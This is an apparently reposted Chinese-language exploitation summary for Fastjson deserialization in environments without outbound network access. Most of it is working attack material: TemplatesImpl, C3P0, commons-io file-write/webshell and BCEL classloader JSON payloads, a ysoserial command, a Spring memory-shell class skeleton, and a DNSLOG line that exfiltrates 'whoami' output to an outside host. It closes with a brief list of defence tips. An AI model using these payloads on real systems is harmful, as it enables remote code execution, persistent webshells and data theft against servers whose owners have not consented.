Fastjson不出网利用总结
字数 1115 2025-08-25 22:59:09
Fastjson不出网利用总结
1. Fastjson基础使用
Fastjson是阿里巴巴的开源JSON解析库,主要提供序列化和反序列化功能:
// 序列化
String text = JSON.toJSONString(obj);
// 反序列化
Object ob = JSON.parse(); // 解析为JSONObject或JSONArray
Object ob1 = JSON.parseObject("{...}"); // 解析为JSONObject
Object ob2 = JSON.parseObject("{...}", VO.class); // 解析为指定类
2. POC演变过程
2.1 基础User类示例
public class User {
private String name;
private int age;
// 构造方法、getter/setter等
}
2.2 序列化与反序列化行为
- 不指定
@type时不会调用构造方法和setter - 指定
@type时:parse()会调用构造方法和特定setterparseObject()会额外调用getter
2.3 关键发现
使用SerializerFeature.WriteClassName会在序列化结果中添加@type信息:
String serializedStr1 = JSON.toJSONString(user, SerializerFeature.WriteClassName);
3. Fastjson不出网利用技术
3.1 TemplatesImpl利用链
适用版本: 1.2.24
利用条件:
- 使用
parseObject()时需要:JSON.parseObject(input, Object.class, Feature.SupportNonPublicField) - 使用
parse()时需要:JSON.parse(text1, Feature.SupportNonPublicField)
利用步骤:
- 创建恶意类:
public class Shell extends AbstractTranslet {
public static void main(String[] args) {
try {
Runtime.getRuntime().exec("open -a calculator");
} catch (IOException e) {
e.printStackTrace();
}
}
// 必须实现的抽象方法
}
-
将恶意类编译后Base64编码
-
构造Payload:
{
"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes":["恶意类Base64"],
"_name":"a.b",
"_tfactory":{},
"_outputProperties":{},
"_version":"1.0",
"allowedProtocols":"all"
}
3.2 回显技术
3.2.1 DNSLOG外带
Runtime.getRuntime().exec("ping `whoami`.xxxxxx.dnslog.cn");
3.2.2 写入静态资源
Runtime.getRuntime().exec("whoami >> /path/to/static/js/consoleinfo.js");
3.3 TemplatesImpl内存马
Spring框架内存马示例:
public class TemplatesImplSpringController extends AbstractTranslet {
public TemplatesImplSpringController() throws Exception {
// 注册恶意Controller
WebApplicationContext context = (WebApplicationContext) RequestContextHolder
.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 注册映射等操作
}
public void test() throws Exception {
// 命令执行逻辑
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
String arg0 = request.getParameter("cmd");
// 执行命令并回显
}
}
3.4 C3P0二次序列化利用
依赖要求:
- commons-collections4 4.0
- c3p0 0.9.5.2
利用步骤:
- 生成序列化payload:
java -jar ysoserial-all.jar CommonsCollections2 "open -a Calculator" > calc.ser
-
将payload转为Hex字符串
-
构造Payload:
{
"e":{
"@type":"java.lang.Class",
"val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
},
"f":{
"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
"userOverridesAsString":"HexAsciiSerializedMap:HEX_STRING;"
}
}
3.5 Commons-io写文件/Webshell
适用版本: Fastjson < 1.2.68
3.5.1 Jre8原始POC
{
"x":{
"@type":"java.lang.AutoCloseable",
"@type":"sun.rmi.server.MarshalOutputStream",
"out":{
"@type":"java.util.zip.InflaterOutputStream",
"out":{
"@type":"java.io.FileOutputStream",
"file":"/tmp/dest.txt",
"append":false
},
"infl":{
"input":"BASE64_DATA"
},
"bufLen":1048576
},
"protocolVersion":1
}
}
3.5.2 Commons-io 2.0-2.6版本
{
"x":{
"@type":"com.alibaba.fastjson.JSONObject",
"input":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.input.ReaderInputStream",
"reader":{
"@type":"org.apache.commons.io.input.CharSequenceReader",
"charSequence":{"@type":"java.lang.String""长字符串(>8192)"
},
"charsetName":"UTF-8",
"bufferSize":1024
},
"branch":{
"@type":"java.lang.AutoCloseable",
"@type":"org.apache.commons.io.output.WriterOutputStream",
"writer":{
"@type":"org.apache.commons.io.output.FileWriterWithEncoding",
"file":"/tmp/pwned",
"encoding":"UTF-8",
"append": false
},
"charsetName":"UTF-8",
"bufferSize": 1024,
"writeImmediately": true
},
// 触发逻辑...
}
}
3.6 BECL攻击(命令执行/内存马)
利用步骤:
-
编译恶意类并转为BCEL格式
-
构造Payload:
{
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "
$$
BCEL
$$
$BCEL_CODE"
}
}
3.7 回显技术
3.7.1 SpringEcho回显
{
"x":{
"@type":"com.alibaba.fastjson.JSONObject",
"name":{
"@type":"java.lang.Class",
"val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"
},
"c":{
"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
"key":{
"@type":"java.lang.Class",
"val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassLoader":{
"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driver":"
$$
BCEL
$$
$BCEL_CODE"
}
}
}
3.7.2 Tomcat回显
{
"a": {
"@type": "java.lang.Class",
"val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
},
"b": {
"@type": "java.lang.Class",
"val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"c": {
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "
$$
BCEL
$$
$BCEL_CODE"
}
}
3.7.3 Ibatis回显(适用于Weblogic/JBoss)
{
"@type":"com.alibaba.fastjson.JSONObject",
"name":{
"@type":"java.lang.Class",
"val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"
},
"c":{
"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
"key":{
"@type":"java.lang.Class",
"val":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassLoader":{
"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driver":"
$$
BCEL
$$
$BCEL_CODE"
}
}
4. 防御建议
- 升级Fastjson到最新安全版本
- 禁用
autoType功能 - 使用安全模式配置
- 对JSON输入进行严格过滤和校验
5. 参考资源
- https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg
- https://mp.weixin.qq.com/s/nKPsoNkHtNdOj-_v53Bc9w